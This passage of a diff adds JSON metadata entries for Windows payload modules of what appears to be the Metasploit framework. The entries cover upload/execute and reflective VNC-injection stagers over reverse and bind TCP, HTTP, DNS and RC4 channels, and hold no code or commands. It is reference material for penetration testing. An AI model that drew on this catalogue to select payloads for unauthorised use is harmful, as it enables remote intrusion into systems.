"windows/reverse_tcp" + }, + "payload_windows/upexec/reverse_tcp_allports": { + "name": "Windows Upload/Execute, Reverse All-Port TCP Stager", + "fullname": "payload/windows/upexec/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/upexec/reverse_tcp_dns": { + "name": "Windows Upload/Execute, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/upexec/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/upexec/reverse_tcp_rc4": { + "name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/upexec/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/upexec/reverse_tcp_rc4_dns": { + "name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/upexec/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/upexec/reverse_tcp_uuid": { + "name": "Windows Upload/Execute, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/upexec/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/upexec/reverse_udp": { + "name": "Windows Upload/Execute, Reverse UDP Stager with UUID Support", + "fullname": "payload/windows/upexec/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "RageLtMan " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_udp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_udp" + }, + "payload_windows/vncinject/bind_hidden_ipknock_tcp": { + "name": "VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/vncinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/vncinject/bind_hidden_tcp": { + "name": "VNC Server (Reflective Injection), Hidden Bind TCP Stager", + "fullname": "payload/windows/vncinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/vncinject/bind_ipv6_tcp": { + "name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/vncinject/bind_ipv6_tcp_uuid": { + "name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/vncinject/bind_named_pipe": { + "name": "VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "UserExistsError" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/vncinject/bind_nonx_tcp": { + "name": "VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/vncinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "vlad902 " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/vncinject/bind_tcp": { + "name": "VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/vncinject/bind_tcp_rc4": { + "name": "VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/vncinject/bind_tcp_uuid": { + "name": "VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/vncinject/find_tag": { + "name": "VNC Server (Reflective Injection), Find Tag Ordinal Stager", + "fullname": "payload/windows/vncinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/vncinject/reverse_http": { + "name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_http" + }, + "payload_windows/vncinject/reverse_http_proxy_pstore": { + "name": "VNC Server (Reflective Injection), Reverse HTTP Stager Proxy", + "fullname": "payload/windows/vncinject/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_windows/vncinject/reverse_ipv6_tcp": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/vncinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/vncinject/reverse_nonx_tcp": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/vncinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "vlad902 " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/vncinject/reverse_ord_tcp": { + "name": "VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/vncinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "spoonm " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/vncinject/reverse_tcp": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager", + "fullname": "payload/windows/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/vncinject/reverse_tcp_allports": { + "name": "VNC Server (Reflective Injection), Reverse All-Port TCP Stager", + "fullname": "payload/windows/vncinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/vncinject/reverse_tcp_dns": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (DNS)", + "fullname": "payload/windows/vncinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/vncinject/reverse_tcp_rc4": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/vncinject/reverse_tcp_rc4_dns": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/vncinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/vncinject/reverse_tcp_uuid": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/vncinject/reverse_winhttp": { + "name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "Borja Merino " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + 